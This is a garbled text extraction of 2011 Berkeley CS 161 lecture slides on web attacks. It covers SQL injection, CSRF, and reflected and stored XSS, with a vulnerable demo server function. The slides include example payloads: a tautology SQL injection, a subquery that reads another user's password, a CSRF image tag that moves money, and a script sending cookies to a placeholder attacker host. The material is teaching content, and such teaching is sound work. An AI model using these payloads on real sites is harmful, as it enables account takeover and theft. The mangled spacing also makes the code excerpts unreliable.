Web Attacks, con’tCS 161: Computer SecurityProf. Vern PaxsonTAs: Devdatta Akhawe, Mobin Javed& Matthias Vallentinhttp://inst.eecs.berkeley.edu/~cs161/February 24, 2011Announcements• Guest lecture a week from Thursday(March 3rd), Prof. David Wagner– Correction: material will not be in scope forthe Midterm• My office hours the week of March 7th willbe by appointment• Homework #2 should be out by tonight,due in 1 weekGoals For Today• Make previously discussed web attacksconcrete– SQL injection– Cross-site request forgery (CSRF)– Reflected cross-site scripting (XSS)• Illustrate additional web attacks– Stored XSS– Clickjacking• … and discuss defensesSQL Injection Scenario• Suppose web server front end stores URLparameter “recipient” in variable $recipientand then builds up a string with the followingSQL query:$sql = "SELECT PersonID FROM Person WHERE Balance < 100 AND Username='$recipient' ";• How can recipient cause trouble here?– How can we see anyone’s account?SQL Injection Scenario, con’tWHERE Balance < 100 AND Username='$recipient'; "• $recipient = foo' OR 1=1; --WHERE Balance < 100 AND Username='foo' OR 1=1; --' "• Precedence & “--” (comment) makes this:WHERE (Balance < 100 AND Username='foo') OR 1=1;• Always true!Demo Tools• Bro: freeware network monitoring tool– Scriptable– Primarily designed for real-time intrusion detection– www.bro.ids.org• Squigler– Cool “localhost” web site(s) (Python/SQLite)– Developed by Arel Cordero– Let me know if you’d like a copy to play withdef6post_squig(user,6squig):6666if6not6user6or6not6squig:6return6666conn6=6sqlite3.connect(DBFN)6666c6666=6conn.cursor()6666c.executescript("INSERT6INTO6squigs6VAL UES66666666666('%s',6'%s',6datetime('now'));"6%66666666666666666666666666666(user,6squig))6666conn.commit()6666c.close()INSERT6INTO6squigs6VALUES(dilbert,6'don't6contractions6work?',666666date);Syntax errorServer code for posting a “squig”INSERT6INTO6squigs6VALUES(dilbert,6' ' || (select password from accounts whereusername='bob') || ' ',666666date);INSERT6INTO6squigs6VALUES(dilbert,6' ' || (select password from accounts whereusername='bob') || ' ',666666date);Empty string literalsINSERT6INTO6squigs6VALUES(dilbert,6' ' || (select password from accounts whereusername='bob') || ' ',666666date);Concatenation operator.Concatenation of string Swith empty string is just SINSERT6INTO6squigs6VALUES(dilbert,6(select password from accounts whereusername='bob'),666666date);Value of the squig willbe Bob’s password!Web Accesses w/ Side Effects• Recall our earlier banking URL:http://mybank.com/moneyxfer.cgi?account=alice&amt=50&to=bob• So what happens if we visit evilsite.com, whichincludes:<img6src="http://mybank.com/moneyxfer.cgi?666Account=alice&amt=500000&to=DrEvil">• Cross-Site Request Forgery (CSRF) attackRequest6(to6127.0.0.1/8080):6GET6666/do_squig?redirect=%2Fuserpage%3Fuser%3Ddilbert6666& squig=squigs+speak+a+deep+truthHOST:6"localhost:8080"REFERER:"http://localhost:8080/userpage?user=dilbert"COOKIE:6"session_id=5321506"Web action with side effectURL fetch for posting a squigRequest6(to6127.0.0.1/8080):6GET6666/do_squig?redirect=%2Fuserpage%3Fuser%3Ddilbert6666& squig=squigs+speak+a+deep+truthHOST:6"localhost:8080"REFERER:"http://localhost:8080/userpage?user=dilbert"COOKIE:6"session_id=5321506"Authenticated with cookie thatbrowser automatically sends alongURL fetch for posting a squigSubversive Script ExecutionCross-Site Scripting (XSS)• Attacker’s goal: cause victim’s browser to executeJavascript written by the attacker …• … but with the browser believing that the scriptinstead was sent by a trust server mybank.com– In order to circumvent the Same Origin Policy (SOP),which will prevent the browser from letting Javascriptreceived directly from evil.com to have full access tocontent from mybank.com• (Do not confuse with CSRF! CSRF is about webrequests with side effects; XSS is about gettingJavascript treated as though a trusted server sent it)16The Setup• User input is echoed into HTML response.• Example: search field– http://victim.com/search.php?term=apple– search.php responds with:<HTML> <TITLE> Search Results </TITLE><BODY>Results for <?php echo $_GET[term] ?> :. . .</BODY> </HTML>• How can an attacker exploit this?17Injection Via Bad Input• Consider link: (properly URL encoded)http://victim.com/search.php?term=<script> window.open("http://badguy.com?cookie = " +document.cookie ) </script>What if user clicks on this link?1) Browser goes to victim.com/search.php2) victim.com returns <HTML> Results for <script> … </script> …3) Browser executes script in same origin as victim.comSends badguy.com cookie for victim.comOr any other arbitrary execution / rewrite victim.com pageDemo on (1) Finding and (2) ExploitingReflected XSS vulnerabilitiesCross-Site Scripting (XSS)Victim clientCross-Site Scripting (XSS)Attack ServerVictim clientvisit web site1Cross-Site Scripting (XSS)Attack ServerVictim clientvisit web sitereceive malicious page12Cross-Site Scripting (XSS)Attack ServerVictim clientvisit web sitereceive malicious pageclick on link123Server Patsy/Victim Exact URL underattacker’s controlCross-Site Scripting (XSS)Victim clientclick on linkecho user input34Server Patsy/Victim Attack Servervisit web sitereceive malicious page12Cross-Site Scripting (XSS)Victim clientclick on linkecho user input34Server Patsy/Victim Attack Servervisit web sitereceive malicious page12execute scriptembedded in inputas though servermeant us to run it5Cross-Site Scripting (XSS)Victim clientclick on linkecho user input34Server Patsy/Victim Attack Servervisit web sitereceive malicious page12execute scriptembedded in inputas though servermeant us to run it5perform attacker action6Cross-Site Scripting (XSS)Attack ServerVictim clientclick on linkecho user input3send valuable data74Server Patsy/Victim visit web sitereceive malicious page12execute scriptembedded in inputas though servermeant us to run it5And/Or:Cross-Site Scripting (XSS)Attack ServerVictim clientvisit web sitereceive malicious pageclick on linkecho user input1234(“Reflected” XSS attacks)Server Patsy/Victim execute scriptembedded in inputas though servermeant us to run it5send valuable data7perform attacker action6Stored Cross-Site ScriptingAttack ServerStored Cross-Site ScriptingAttack ServerServer Patsy/Victim Injectmaliciousscript1Stored Cross-Site
View Full Document
Unlocking...